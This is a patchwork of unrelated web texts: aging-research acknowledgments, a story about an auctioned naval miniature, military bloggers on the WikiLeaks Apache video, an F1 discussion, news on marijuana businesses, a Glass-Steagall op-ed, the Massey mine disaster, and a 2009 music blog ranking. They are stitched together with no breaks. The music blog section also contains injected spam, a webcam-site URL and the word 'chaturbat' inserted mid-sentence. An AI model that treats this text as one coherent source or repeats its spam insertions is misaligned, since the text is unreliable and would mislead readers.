The problem of laboratory mice in aging research has been discussed extensively by some authors .
In addition to the papers I have already mentioned , see Harper , J. M. 2008 .
“ Wild - derived mouse stocks : an underappreciated tool for aging research . ”
Age 30 : 135-145 ; and Miller , R. A. et al. 1999 .
“ Exotic mice as models for aging research : polemic and prospectus . ”
Neurobiology of Aging 20 : 217-231 .
Many thanks to Bret Weinstein for drawing my attention to the fact of long telomeres in laboratory mice , and for discussions about some of the implications this may have .
Many thanks also to Nicholas Judson and Jonathan Swire for insights , comments and suggestions .
Miniature portrait of Scots naval hero goes on sale
The miniature is expected to fetch up to £ 15,000 at auction A tiny portrait of a Scottish naval officer who helped set the White House ablaze is estimated to fetch up to £ 15,000 at auction next month .
The miniature of Sir Pulteney Malcolm ( 1768 -1838 ) , from Dumfriesshire , measures just 10 cm in height .
In August 1814 Sir Pulteney was third in command of a fleet which set fire to several public buildings in Washington , including the White House .
The miniature portrait has been in the Malcolm family since 1806 .
The fire also raged through other buildings at the heart of US government , housing the Senate and the House of Representatives .
The attack was said to be in retaliation for the American looting of York , Upper Canada , now known as Toronto , in 1813 .
High rank
The third son of George Malcolm , Sir Pulteney was born at Douglan , near Langholm , on 20 February 1768 .
He went on to command a squadron in the North Sea during The Hundred Days ' War , and achieved the rank of Admiral of the Blue in 1837 .
He also served with the Duke of Wellington and Horatio Nelson .
In 1816 , Sir Pulteney was appointed Commander - in - Chief on St Helena , guarding Napoleon Bonaparte .
He died in 1838 , aged 70 - years - old .
' Fierce battle '
The sale features a miniature of his younger brother , Sir Charles Malcolm , who was also a naval officer .
This lot is estimated at up to £ 12,000 and both miniatures are by George Engleheart .
Camilla Lombardi , of auction house Bonhams , said : " The miniatures of the two Malcolm brothers are superb examples of Engleheart 's work from the pinnacle years of his career .
" Fresh to the market and with the provenance of having remained in the sitters ' family since 1806 , we look forward to a fierce battle to secure them on the day of the sale . "
Both works will go under the hammer in the Fine Portrait Miniatures sale at Bonhams in London on 8 April .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Ice Cream never goes out of season at Toft ’s Dairy in Sandusky !
With over 70 different flavors of ice cream🍦 and frozen yogurt , and some [… ]
If you have a feature you would like to propose for this list , please add it to the Features Inbox A team triages that list regularly and will handle adding to and prioritizing this list .
Thanks !
Michael Shelden , author of “ Orwell : The Authorized Biography , ” points out that the oft - used quotation is , in fact , incorrect .
In an e-mail he wrote :
“ The accurate quote from Orwell is from an essay on Kipling that he published in Horizon magazine in 1942 : ‘ He sees clearly that men can only be highly civilized while other men , inevitably less civilized , are there to guard and feed them . ’
“ Fred Shapiro points out the confusion between this correct version and others on p. 569 of the latest ed. of the Yale Book of Quotations . ”
As much as in the general public , military blogs have reacted with passion to the released Wikileaks video of a 2007 Apache attack in Iraq .
With more expertise than most viewers — as well as more empathy , even among those who felt the pilots acted improperly — they explored a range of issues :
Were the people in the video carrying weapons ?
Is Wikileaks a security risk ?
Did the military fail in not explaining the video more fully to the media ?
Should journalists operate so closely to insurgents ?
At A Look Inside , Anthony Martinez , an infantryman who has experience with aerial footage , writes with authority about the aerial attack .
I highly suggest reading his entire post :
I have spent quite a lot of time ( a conservative estimate would be around 4500 hours ) viewing aerial footage of Iraq ( note : this time was not in viewing TADS video , but footage from Raven , Shadow , and Predator feeds ) …
Between 3:13 and 3:30 it is quite clear to me , as both a former infantry sergeant and a photographer , that the two men central to the gun-camera ’s frame are carrying photographic equipment .
This much is noted by WikiLeaks , and misidentified by the crew of Crazyhorse 18 .
At 3:39 , the men central to the frame are armed , the one on the far left with some AK variant , and the one in the center with an RPG .
The RPG is crystal clear even in the downsized , very low - resolution , video between 3:40 and 3:45 when the man carrying it turns counter - clockwise and then back to the direction of the Apache .
This all goes by without any mention whatsoever from WikiLeaks , and that is unacceptable .
At 4:08 to 4:18 another misidentification is made by Crazyhorse 18 , where what appears to clearly be a man with a telephoto lens ( edit to add : one of the Canon EF 70 - 200 mm offerings ) on an SLR is identified as wielding an RPG .
The actual case is not threatening at all , though the misidentified case presents a major perceived threat to the aircraft and any coalition forces in the direction of its orientation .
This moment is when the decision to engage is made , in error .
( note : It has to be taken into consideration that there is no way that the Crazyhorse crew had the knowledge , as everyone who has viewed this had , that the man on the corner of that wall was a photographer .
The actions of shouldering an RPG ( bringing a long cylindrical object in line with one ’s face ) and framing a photo with a long telephoto lens quite probably look identical to an aircrew in those conditions . )
I have made the call to engage targets from the sky several times , and know ( especially during the surge ) that such calls are not taken lightly .
Had I been personally involved with this mission , and had access to real - time footage , I would have recommended against granting permission .
Any of the officers with whom I served are well aware that I would continue voicing that recommendation until ordered to do otherwise .
A few of them threatened me with action under Article 15 of the Uniform Code of Military Justice for doing so .
Better officers than they , fortunately , were always ready to go to bat for me and keep that from happening .
That said , if either of the clearly visible weapons been oriented towards aircraft , vehicles , troops , or civilians I would have cleared Crazyhorse 18 hot in a heartbeat and defended my actions to the battle staff if needed .
At Small Wars Journal , considered the pre-eminent military blog because of its diverse audience and contributors which span from sergeants to generals , one commenter argues :
Wikileaks is not a security risk .
The people who give them information are the security risk .
Wikileaks is no different than any capable investigative journalist .
They just happen to focus on these things more than most and provide a convenient website .
I do , however , object to the editorializing of the leak .
You want to show the AWT video and let people decide what is or is not appropriate , that is one thing .
But the comments added by Wikileaks were politicized and pre-interpreted what was going on in the video .
The same commenter also withholds judgment from the action stating :
I was there ( same Area of Operations , different job , different dangers ) but ca n’t talk to what threat these particular aviators were facing or what threat they thought was being posed to the ground forces they were supporting .
That ’s where someone in the know should speak , on the record , about the situation and present the video in context .
If there was an investigation afterward , that should be disclosed .
I ’m not saying its going to change the tragedy that occurred or even justify what happened , but context needs to be used to help the public understand what is going on and not allow Wikileaks to set the agenda .
Starbuck , an Army Blackhawk pilot , in his blog Wings Over Iraq points out the limits of thermal and optical sensors in helicopters :
Despite the advances in thermal and optical sensors , it ’s still extremely difficult for an air crew to tell an insurgent from a civilian .
The Apache pilots believed that they saw AK - 47s and RPGs in the hands of the figures in the video .
An examination of the video , however , is inconclusive .
They could really be carryinganything .
Starbuck says counterinsurgency tenets are not just important to infantryman but also to aviators and this video exemplifies the importance of teaching aviators counterinsurgency :
Upon hearing that one of the victims is a young girl , the pilots laugh , “ Well , it ’s their fault for bringing their kids to a battle ” .
Wrong .
The pilots fail to mention these two men walking into the building , nor do they mention another unarmed man ( 34:40 ) walking directly in front of the building as they shoot a Hellfire missile .
Again , read FM 3 - 24 ( Counterinsurgency Manual ) , Appendix F. Another obvious Counterinsurgency failure .
Schmedlap , a former infantry officer , on his blog dissects whether or not the people in the video were combatants or civilians :
It seems plausible that some of them were combatants .
It is not clear that all of them were .
Among the dead were individuals who were apparently being paid by Reuters as journalists .
I am not suggesting that merely being employed by Reuters was grounds for killing them , but Reuters was notorious for hiring insurgents to obtain “ news ” for them when said stringers were not helping to manufacture propaganda for the insurgency , so count me as unimpressed by the concern about danger posed to journalists .
My only concern is whether the people killed were justified in being killed , how the decision to kill them was made , and whether we have learned anything from it .
Schmedlap goes onto argue : “ At worst , the events in this video show individuals wanting to get into a firefight first and wanting to analyze their actions second – kind of like the guys who shot first at Pat Tillman and worried about positive identification later .
I suspect the reality lies somewhere between the best and worst . ”
While the web has gone viral with the video , it has been surprising and disappointing that the official military response has been nonexistent .
While there is much dissension on military blogs concerning whether the pilots followed the rules of engagement , there is unanimity among military bloggers that the military has failed by not having a media plan or response to this episode .
A military that is seeking to embrace Web 2.0 needs to be more prepared for these episodes like the release of this video .
Back to Small Wars Journal :
Sadly , it looks like the DoD , or the government on whole , has completely dropped the ball on this and is unlikely to address the issue at all .
This should really be a measure of the effectiveness of our strategic communications gurus to seize this opportunity to show what the real video showed in context ( where were the US troops that were being overwatched , what was the state of violence at this point , how many helicopters had been engaged / shot down in this part of Baghdad at this point . )
As has been shown time and again ( think Rodney King ) video of an event is not the whole story , context is critical .
But days have passed now and it does n’t look like anyone but a few on - line posters is making any effort to put events into context .
At Blackfive they are also wondering how the military has bungled this media engagement , in a post titled “ Open Letter to Central Command Public Affairs Office : ”
It looks to me like it started when you did n’t respond to what looks like a reasonable use of the FOIA by Reuters .
The result of this is that you let your enemy get inside your OODA loop .
You could have taken the FOIA request and complied with it on your terms to control the narrative .
Perhaps you could have leaked the video out first to a few trusty bloggers who would have seen it for what it was :
An ugly , sad , but common story .
Sure , there was some gallows humor in there and some false bravado .
But there were also American servicemen paying scrupulous attention to the ROE and a group of them , panicked out of fear for a little Iraqi girl , running through some dangerous urban streets to get her medical attention .
Within the military blogs are many defenders of the actions of the pilots .
Captain ’s Journal writes :
Embedding with insurgents is highly dangerous , and in this instance it turned around and bit Reuters like a snake .
Reuters is in no position to question the ROE or the decisions made that fateful day .
But concerning those decisions , I have repeatedly pressed the issue with rules of engagement for snipers that offensive operations are not contemplated in the standing ROE , and yet they should be .
I have no problem with any of the decisions made that day .
I support allowing ground forces to follow the same Rules of Engagement that Close Air Support followed in this instance and the drones follow in their attacks against the Taliban leadership in Pakistan .
The Wikileaks video began with a quote from George Orwell , so to end this post I would like to end with a quote attributed to Orwell which many in the military identify and often use in their signature block :
“ People sleep peaceably in their beds at night only because rough men stand ready to do violence on their behalf . ”
In the golden days of F1 every Grand Prix was a classic , with 20 changes of lead and a photo finish .
Dashing drivers would climb from beautiful , sponsor - free cars , light a cigarette and regale the world ’s press with quick - witted quips .
Nonsense , of course .
It ’s easy to write off modern F1 as a pale shadow of its former self , but all too often we are looking at the past through rose - tinted spectacles .
Still , there is much F1 can learn from its past .
Which is why we should begin our discussion of how to make F1 better by asking what made F1 great , and what – if anything – is it missing now .
I started watching F1 in 1989 and I always think of those first three years as among the best ever seen in F1 .
These were the glory days of Prost - vs - Senna - vs - Mansell and I saw some spellbinding races – Hungary ’ 89 , Suzuka ’ 89 , Mexico ’ 90 , Suzuka ’ 90 , Spain ’91 and more .
But I suspect I ’m falling victim to the ‘ rose - tinted spectacles ’ effect when I forget about the less exciting races – the ones where Senna or Prost led all race long and only saw a rival car when they lapped them .
Re-watching race highlights on Youtube makes things worst .
A ten - minute race clip can make any race seem exciting – but what happened in the other 110 minutes ?
Watch an unedited race from the seventies or eighties and a few things strike you .
First , there were so many retirements .
Barely half the field made it to the chequered flag on a good day .
Today a failure for one of the top teams is unusual , even at this early stage in the season .
Driver errors were not necessarily more common , but they were more likely to result in a retirement .
Cars became stuck on kerbs , bogged down in gravel traps and smashed into walls .
Closer barriers contributed to a greater sense of speed and a more impressive spectacle – as did the showers of sparks from those low - running cars of the early nineties .
Modern safety standards may make it impossible to recapture that kind of drama .
Above all , looking at past races you get the sense that everything was much less professional , even as little a 20 years ago .
Teams were less well - prepared , more likely to make mistakes .
But they ca n’t un-learn what they already know any more than we can put a wall around the outside of Eau Rouge .
Not all the lessons we learn from the past can be applied to the future .
Over to you
What do you think we can learn from past F1 seasons ?
Here ’s some questions for you discuss in the comments .
When did you start watching F1 ?
Which do you consider were the best seasons you ever saw – and why ?
We never see slipstreaming races like those we had at Monza in the fifties and sixties any more .
Races where a different leader every lap was common , and a driver knew if he led at the start of the final lap he would n’t win a race .
Why is that ?
Would you like to see a return to that kind of racing at some tracks ?
In the past F1 cars have lapped circuits in under a minute ( at Dijon ) and up to ten ( at Pescara and the Nurburgring ) .
Now they take a minute and a half , give or take 15 seconds , wherever they go .
Why has that variety been lost , and should we bring it back ?
The practice of multiple circuits sharing one Grand Prix , which was common in France and Britain for decades , has disappeared everywhere apart from Germany .
Is this a good thing ?
Why is the Circuit de Catalunya , a track that was lauded as an excellent venue for overtaking when it was added to the calendar in 1991 , now condemned for producing boring races ?
Share your thoughts in the comments .
This is part of “ Making F1 better ” , a series of articles looking at ways to improve Formula 1 .
Fore more information see the introduction : Making F1 better : a discussion series
Making F1 better
OAKLAND , Calif . —
Like hip - hop , health food and snowboarding , marijuana is going corporate .
As more and more states allow medical use of the drug , and California considers outright legalization , marijuana ’s supporters are pushing hard to burnish the image of pot by franchising dispensaries and building brands ; establishing consulting , lobbying and law firms ; setting up trade shows and a seminar circuit ; and constructing a range of other marijuana - related businesses .
Boosters say it is all part of a concerted effort to trade the drug ’s trippy , hippie counterculture past for what they believe will inevitably be a more buttoned - up future .
“ I do n’t possess a Nehru jacket , I ’ve never grown a goatee , I ’ve never grown my hair past the nape of my neck , ” Allen St. Pierre , the executive director of the National Organization for the Reform of Marijuana Laws said .
“ And I do n’t like patchouli . ”
Steve DeAngelo , the president of CannBe — a marketing , lobbying and consulting firm here — will not even use the word “ marijuana . ”
Calling it pejorative , he prefers the scientific term “ cannabis . ”
Please turn on JavaScript .
Media requires JavaScript to play .
Some critics have called Birdemic : Shock and Terror the worst film ever made but it is rapidly becoming a hot ticket in America .
It is the story of an invasion of lethal eagles , being celebrated for its awfulness .
Producers have spent more marketing the film than making it , as Talking Movies ' Tom Brook reports from New York .
Police arrested Andrew Grande ( porn name Dustin Michaels ) with a bag of weed in his possession , which he apparently tried to swallow .
When he resisted arrest , they tased him , and he choked on the bag .
A reality cameraman filmed it .
This long , difficult - to - watch clip from a Panama City Beach , FL news report shows the 23 - year - old 's struggle and eventual death .
By itself , the pot would have warranted misdemeanor possession .
The camera crew that caught Grande 's death were with Zoo Productions , the people who produce Are You Smarter than a 5th Grader , Girls Behaving Badly , Guys Behaving Badly , and various Tila Tequila specials .
Local news reports say Grande was filming a reality show , but do n't specify its name .
[ Towelroad ] [ WJHG ]
L ast week the SEC filed a civil fraud suit against Goldman Sachs .
Coincidentally , President Obama is now stumping for financial reform , using the Goldman Sachs case to illustrate the need for reform .
Democrats have found one issue that could put them on the side of independent voters before November .
Any Republican opposition to the Democratic bill can be portrayed as fighting for Wall Street fat cats .
Realizing that , Senate Republicans are backing away from threats of a filibuster .
Will the proposed bill end the cycle of boom and bail - out ?
The opposition says no .
That`s probably right , but has less to do with the bill than with the nature of Congress .
Congress` appetite for bailouts has only grown over time .
The reform bill cannot prevent a future Congress from bailing out large corporations –whether it be industrial firms or Wall Street firms .
Still , the bill attempts to create a new system for liquidating failed firms , including an industry - financed fund of $ 50 billion to ease the liquidation process .
The one reform Congress won`t adopt is returning to the world in which commercial banks and investment banks were forced to maintain separate ownership .
The Glass - Steagall
Act built a wall between ownership of commercial and investment banks in the wake of the 1929 market crash .
In 1999 , both parties overwhelmingly repealed the Glass - Steagall Act , saying it was necessary to ensure U.S. competitiveness with global financial competitors .
Wall Street was deemed smart enough to avoid past mistakes .
The result ?
Tearing down that wall of separation contributed greatly to the financial bubble and subsequent collapse .
By repealing Glass - Steagall , Congress hoped that the fear of losses would cause the Gordon Gekkos of the world to moderate their greed for risk .
The financial collapse demonstrated the folly of abandoning restraints on ownership .
Obama`s reform effort is taking fire from progressives as well as Republicans .
Former Clinton Secretary of Labor Robert Reich says the reform bill does not go far enough .
He contends the bill will strengthen the largest banks at the expense of their smaller competitors .
Reich says “ resurrect the Glass - Steagall Act in its entirety so commercial banks are separated from investment banks . ”
He describes commercial banks as lending institutions and investment banks as operating in a casino called Wall Street , an apt description .
An alternative approach to reform is to create additional regulatory bodies and grant greater discretionary powers to bureaucrats .
The hope is that regulators will make better decisions than the banks themselves .
Where there is wide regulatory discretion and oversight , there is wide latitude for lobbying and corruption .
Expanding regulatory discretion won`t ensure financial security .
Regulated firms routinely seek to influence the regulators charged with overseeing their industry .
It only takes a few well - placed people to undermine efforts at effective enforcement .
This week the Pew Research Center released a poll showing that just 22 percent of respondents trust the Federal government about always or most of the time .
The average voter gets it .
After all , our entire system of government is designed to restrain the exercise of government power .
Still , the largest financial institutions have proven themselves unwieldy .
Record profits at such firms were built on speculation , excess leverage and even fraud .
Reich`s approach has the virtue of certainty for all concerned .
Limiting the size of banks and separating commercial banks from Wall Street would mean that no firm was truly too big to fail anymore .
Reich also calls for all derivatives contracts to be traded on public exchanges .
The murky accounting around such contracts was a factor in the speculative bubble .
It is also at the heart of the Goldman Sachs case , where a hedge fund helped structure a pool of mortgages to be sold by Goldman , then bet the investment would fail .
Reich`s proposal could sway many voters who objected to the bail - outs –both by President Bush and by President Obama .
Send comments or suggestions to barroompolitics@live.com .
The opinions expressed on this page are those of the authors and not the Trail - Gazette or its staff . *
Hundreds of mourners staged candlelight vigils in West Virginia towns the evening of April 7 honoring the 29 coal miners who died in the explosion at Massey Energy ’s Upper Big Branch Mine , Monday April 5 , and for the four missing miners .
Rescuers were forced to turn back , once again , by heavy concentrations of explosive methane in the five - miles - long mine .
The biggest vigil was in Cabin Creek , site of coalfield wars a century ago as miners struggled to win union rights in the face of vicious coal company union - busting and brutal exploitation .
W. Va. Gov. Joe Manchin , a Democrat , came to the Cabin Creek vigil to comfort the families of miners of those who died and of those still missing .
Former Whitesville , W. Va. Mayor , Earl Howell , 85 , himself a retired coal miner told Reuters that safety and health in the coal mines has sharply declined as the number of unionized mines has plummeted .
That charge was echoed by Jimmy Platt , 54 , a former Massey miner now employed as a chef .
Platt said the mine “ was an accident waiting to happen ” as Massey ran roughshod over safety and health regulations .
Ten of the citations issued against Massey were for poor ventilation to clear the mine of explosive methane .
Pratt said the main difference between a non-union and a unionized mine “ is the right to say no ” and refuse to work in a gas - filled mine .
In Washington , Labor Secretary Hilda Solis promised to find out how such a tragedy could happen .
“ Twenty - five hardworking men died unnecessarily .
The very best way we can honor them is to do our job .
The investigating team is committed to finding out what happened and we will take action . ”
Meanwhile , more muck oozed out on Massey CEO Don Blankenship .
First , at about 9 a.m. April 8 , Blankenship updated his Twitter page , which infuriated readers of the Charleston Daily Mail .
But the real muck , came when Alternet posted an expose that first appeared on Hullabaloo .
“ Blankenship spent over $ 1 million dollars along with other U.S. Chamber ( of Commerce ) buddies like Verizon to sponsor last year ’s Labor Day Tea Party , also known as the ‘ Friends of America Rally ’ with Blankenship , himself , among the featured speakers . ”
In a November 2008 interview with the Williamson Daily News of West Virginia , Blankenship sneered that environmentalists are “ crazy greeniacs ” who are “ taking over the world . ”
Denise Winebrenner Edwards , a veteran writer for the PW , reports that the Labor Day tea party rally was held at the “ remains ” of a mountaintop removal mine just south of Logan , W.Va .
It underlined Massey Energy ’s spearhead role in this devastating form of coal mining that has destroyed 400,000 acres of mountaintops in Appalachia and buried or poisoned 1,200 miles of once pristine rivers and streams .
Edwards describes Blankenship as a corporate “ mobster … buying and selling Republican politicians , resorting to violence and defying the law in the name of profit . ”
Massey broke a union - recognition strike by the United Mine Workers in the mid-1980s .
President Reagan , fresh from destroying PATCO , the air traffic controllers union , gave full support to Massey ’s use of strikebreakers , guarded by gun thugs , armored cars and machine guns .
Blankenship is a director of the National Mining Association and a director of the U.S. Chamber of Commerce .
In a news special , “ Is God Green ? ” broadcast Sept. 7 , 2007 , Bill Moyers Journal featured working people from southern Appalachia who are fighting mountaintop removal mining .
Moyers interviewed Carmelita Brown , who charged that Massey poisoned the water in her well .
“ In taking on Massey , the Browns and their neighbors are taking on Massey ’s president and CEO , Don Blankenship , ” Moyers said .
A video clip flashes on the screen with Blankenship proclaiming pompously , “ Unions , communities , people , everybody ’s gonna have to learn to accept that in the United States you have a capitalist society , and that capitalism , from a business viewpoint , is survival of the most productive . ”
Photo : Jeff Gentner / AP
Scotter 's stuff
When we posted our first year - end lists way back in 2006 , the whole mp3 blog thing was still fairly new .
We certainly were n't the trailblazers , but we did have the advantage of starting our little music blog before the internet became flooded with the likes of us , before services like Hype Machine and Elbo.ws were required to sift thru the ever - growing cosmos of the music blogosphere .
So instead of ranking and listing and widdling down and hierarchizing as I 've done for the past few years , I 'm just going to give you my favorites in a few catagories that I hope matter to you .
The good news is that my favorite music this year and this decade does n't seem to be everybody else 's favorite music , which gives me a chance to advocate for only a handful of artists , in the hopes that they 'll reach your ears with the same delight that they 've reached mine .
Best Local Detroit Track of the Year
" Electric Way " - Zoos of Berlin
Zoos of Berlin
This year , I made it to only a fraction of live shows , compared to years past .
But I still must have seen Zoos of Berlin 6 or 7 times .
I 'm a fan of all the tracks on their debut Taxis and their EP , there 's something about " Electric Way " that keeps me coming back .
It 's like nothing else they 've released - a dance party jam .
Those first few snare hits from drummer Colin Dupuis launch you into a devastating rhythm of Trevor Naud 's bright - toned guitar rakings and Will Yates ' Stevie Wonder - like keyboard taps , with Daniel Clark holding it down with a slow , laid - back , and sleek bass line .
The breakdown is fucking majestic .
And the highlight of the song for me is Dupuis ' gradually resounding crash cymbal hits , coming out of the bridge at 2:50 - a little touch that makes a hell of an impact .
But the most interesting thing about " Electric Way " is that it kind of ruins the feel of the Taxis LP as a whole .
The album is defined by its consistent use of the downbeat - sometimes emulating the chugging of a train , at others the pulsing of blood - lavishly draped with Yates ' aggressive keyboard layering over Clark 's basslines , which move Escher - like over and under the chaturbat melodies .
On the whole , it 's a heady , elegant affair .
The word " debonair " has been used by some reviewers , and appropriately so .
But " Electric Way " is all upbeat , dancy , unstoppably catchy .
It just does n't fit in with those other songs .
Including " Electric Way " as the penultimate track on Taxis is , to me , the equivalent of having Stevie Wonder 's " Sir Duke " as the second - to - last track on Van Morrison 's Astral Weeks .
But who can blame the Zoos for doing this ?
If you had written a song like " Electric Way , " could you have saved it for later ?
Could you have murdered this darling ?
I could n't , and I 'm glad Zoos of Berlin could n't either .
It must be tough to be such a talented band that you can't help but mess up your excellent album with one of the best songs of the year .
P.S. The decision for best Detroit track of the year would have been more difficult if The Dead Bodies would have released a recording of " Hugs and Kisses . "
Album of the Year
The Atlantic Ocean - Richard Swift
Richard Swift
" The Atlantic Ocean "
I judge an album on two essential points :
1 ) do the songs get stuck in my head to the point where I unconsciously sing them as I go about my day
2 ) do I actually care about the songs , on a personal level ?
Most albums I listen to fall into either one or the other category .
Sometimes , I run across albums with high marks in both categories .
But to be my favorite album of the year , it 's got to be both , and in spades .
This is why Richard Swift 's The Atlantic Ocean beats out Wolfgang Amadeus Phoenix as my favorite album of the year .
As much as I love " Lizstomania " and the entire Phoenix album ( I think " Armistice " is actually the best song on the album ) , when the first line is nonsense like " So sentimental .
Not sentimental , no , " I can't honestly make it the album of the year , no matter how much I adore it .
I love that song , but I just do n't really care about it .
I feel the same way about this http://www.jasminlive.mobi/
album that I feel about a lot of Michael Jackson 's music - it 's great to dance to , great to play in the car , it 's undeniably great , but it does n't really mean anything , does it ?
On the other hand : " Save your prayers / I 'm an unbeliever / and I do n't fall apart easily / ' cause I got no heart / got no one to make me cry .
/
And everyone knows when they 're gonna die , " sung over a steady piano thumping like a hammer on the nails of a coffin - that 's some heavy shit , and it 's catchy !
Or : " Where have you gone ? /
And no lights in the home .
/
We gave it our best but we made it a tomb .
/
So I 'll take the ocean , and you 'll take the land .
/
And hope that our son understands . "
This guy 's singing about real stuff , in a really interesting way .
Which is n't to say the album is a dirgefest .
The melodies are more often than not extremely light and breezy - easy to sing along to and memorable , and there 's a lot of fun in this album too .
We have Swift singing joyfully " Sometimes you lose sometimes you win . / I want to drink until I 'm broke and then just see what kind of shit we get in . "
And these are n't even the most memorable lines .
( that might be from the title track : " I 'm part of the scene . / I 'm part of the scene . / I got the drum machine .
/ Boom - tap , boom - tap. / Boom - tap , boom - tap . " ) .
Swift 's singing voice is an unusual one .
If it were n't for the modern production quality and the fact that Swift uses the history of pop music over the past 40 years to inform every single note of the album , I might have thought that this was a long - long album sung by Peter Lorre .
I like unusual voices - my two favorite singers of the past decade are Dan Bejar and Joanna Newsom , and that tells you something .
But Swift 's voice does have a reach and fluidness to it , even though he can often sound as if he 's gargling water while singing .
Ultimately , this is a good thing - if anyone else were singing these songs , they would n't sound as good ( no one can sing " Atlantic 000 - cean " the way he does ) .
But the voice is only part of what kept me coming back to this excellent collection of diverse songs full of various stylings and a lot of grace .
First , there are so many different sounds in this album : cheesy electronic keyboard runs , cowbell , 70s / 80s McCartney / Harrison synths that sound better than the solo Beatles albums they were drawn from .
The modes run from traditional Irving Berlin - like ballads to straight up Motown swing and soul to rollicking rhythm n' blues .
This album 's really got everything you could ever want , and makes it hard to move on to other albums because there 's so much good in here .
Opener " Atlantic Ocean " is instantly catchy , with an unforgettable hook , letting you know over and over that " you 're gonna drown , drown , drown . "
" The Original Thought " starts sleepy and moody but turns into a swaggering little tune that gets you bouncing in your seat and , in my case , strutting down the hallway at work while listening on my iPod .
It 's hard to say too much about this album without seeming to be too overzealous about its charms .
Richard Swift is a hook - machine .
But the hooks are grounded in gravitas : the songs are about heartbreak , break - ups , and many times about coaxing someone to not cry .
Swift 's lyrics have a certain existential charm .
Like Jens Lekman , Morrissey , Andrew Bird , Leonard Cohen , and The High Strung 's Josh Malerman , Swift has a way of expressing the difficulties of living in a godless , uncaring world while still caring a hell of a lot about it .
He often tackles issues of loss or heartache with arch wisecracks or downright sarcasm , but he does so in full and sometimes surprising orchestrations .
No matter how bleak things can get , this guy can write one hell of a pop song .
The Atlantic Ocean - Richard S .
Honorable Mentions
Phoenix - Wolfgang Amadeus Phoenix
Why ?
- Eskimo Snow
Best Tracks of 2009
Tie : " You Saved My Life " - Cass McCombs
Cass McCombs ' Catacombs is one of those albums that you want to download at a very high quality in order to capture the excellence of its recording and mixing .
With a good set of headphones , you can hear the air in the room of the recording studio , the reverberation coming off every snare hit , the articulating sounds coming from the back of McCombs ' throat .
" You Saved My Life " is the album 's masterpiece .
It 's slow and building , sweetly sung , and gripping , yet it 's not some heart - wrenching , plaintive ode , but an honest lyric dedicated to a lover who has made all the difference , encapsulating all that comes with knowing that " there 's so much to lose . "
The best part of the song to me is at the end when McCombs sings the " you " in " you saved my life " with a whimsical high - falsetto , a jokey little voice crack that I first interpreted as McCombs ruining the song .
But after repeated listens , I came to a different conclusion .
When your life is so good , and you feel that you 've really found where you should be and who you are in this crazy , often sad world , you 're totally into jokes !
There 's room for them .
That crack in McCombs ' voice is a well - deserved wise crack , and it 's the best part of the whole song .
Tie : " One More Time " - The Library ( now known as Prayer )
" One More Time "
UPDATE : As my readers who know about music real good have pointed out , this is actually a Joe Jackson song .
I listened to the original version of this song just now , and it 's quite great , although it does n't dismiss the fact that The Library / Prayer did a good job of covering it and making it their own .
I 'd even say that they 've made the hook even more catchy than the original version .
That being as it may , covers do not qualify for making this year - end list , and since Jackson wrote this song in the late 70s , his version can't make the list either .
Congrats , Cass McCombs , you win our prize !
The backstory :
This past spring , I received a package from some music PR agency with a bunch of promo CDs .
It had some decent stuff , but most of it I listened to once and never again .
But included was this mysterious , non-descript CD case with a drawing of a pope or cardinal blessing some dude , with the background in a stain - washed pink .
The name of the band was The Library , and on this very good EP is a song called " One More Time , " a song that I 've listened to more than any other song this year .
Recently , you may have heard the song on TV .
A bad version of it is now a Taco Bell commercial .
You 'll know it next time you see it on the TVs .
" One more time . / One more time .
/
Say you 're leaving .
/ Say goodbye . "
Well , that jingle is a shadow of what might be one of the most epic hooks I 've ever heard .
An electronic , dance - club pop song , " One More Time " incorporates all the tricks that any Top 40 songsmith ever employed for the likes of Brittney , Gaga , or Madonna , but it does it with such verve that it 's really impossible to say there is a better pop song on those Top 40 charts this year .
And yet the band is still a mystery to me , mostly because they did a terrible job of naming themselves .
" The Library " pulls up 70,700,000 results in Google , and I 'm guessing less than 1 % of those apply to this band .
Their myspace page is a wonder in failed usability - taking out all of the features that allow people to find out what the band is all about and leaving that annoying music player that works like crap .
It seems as though the band has recently changed their name to " Prayer , " which is an even dumber name , pulling in 91 million unrelated and higher - ranking results .
So apparently , the name change was for reasons that were more fatuous than practical , because Prayer is a pretty bad name for a band .
The end result is that they made it too difficult for me to really learn anything about them , and after awhile I just gave up .
What I did find out thru their label page is that these guys are from LA , and play mostly LA clubs in the electro music scene .
The lead singer looks like he 's from LA ( please insert all your midwestern stereotypes about people from LA here ) .
But one thing I know for sure is that this guy is responsible for what I consider the best pop song of the year and , with Mr. McCombs , the best track of the year .
Honorable Mentions for Track of 2009
" Marrow " - St. Vincent
While I 'm not a big fan of the album , this track really blows my mind , probably because a lot of it reminds me of what Xiu Xiu would sound like if Jamie Stewart would stop being so difficult .
" Something is Squeezing My Skull " - Morrissey
It pulls riffs and rhythm from four different songs from Your Arsenal and Southpaw Grammar but the melody Moz sings in the chorus , with that killer vibrato , is the best vocal maneuver he 's pulled off in years .
" Now We Can See " - The Thermals
This is what happens when you take the best of 90s alternative rock and make it your own .
" Lisztomania " - Phoenix
Just because Wolfgang Amadeus Phoenix was one of the most overrated albums of the year does n't mean it was n't also one of the best .
" Leftovers " - Jarvis Cocker
It takes place at a museum .
How can I not love this song ?
Todd 's Favorite
Maybe it 's a result of my hampered attention span , or maybe it's a noncommittal fear stoked by the ceaselessly fast churn of new musical acquisitions as demanded by the perpetually buzzing hive mind of blogging culture , but I really felt drawn toward the EP format this year as a way to discover and indulge in new music without having to sit through - god forbid - the entire 40 - plus minutes required for full length albums .
Keeping in the spirit of the times , here are a few of my favorite EPs of the year :
10 . Deerhunter - Rainwater Cassette Exchange
Deerhunter - Rainwater Cassette Exchange
" Famous Last Words " ( buy )
Deerhunter is window shopping on the Rainwater Cassette Exchange EP .
With " master the art of psychedelic drone rock " checked off their musical bucket list , the band has taken the opportunity to set aside their heavier sonic baggage and experiment with a leaner , more diverse set of styles .
In the course of a spare fifteen minutes , Deerhunter manage to traverse from languid tropical punk to hyper - compressed Krautrock to a jangly , piano - and - tabla Georgian raga before returning to the tremolo - tinged garage rock they mastered back on Microcastle , all without breaking a sweat or indulging in so much as a single extraneous guitar solo .
9. Johnny Headband - Phase 3
Johnny Headband - Phase 3
" Wastin ' Time " ( download )
Resurrecting the frenetic energy of rave - era Primal Scream with the clamoring expansiveness of TV on the Radio , Johnny Headband have released a beast of an EP - a post - apocalyptic bacchanal rife with electrically charred bass , sandstorm guitars and howling , multi- tracked harmonies .
It 's just a shame that a noise this bombastic was n't heard by more people outside Detroit .
8. Julianna Barwick - Florine
Julianna Barwick - Florine
" Cloudbank " ( buy )
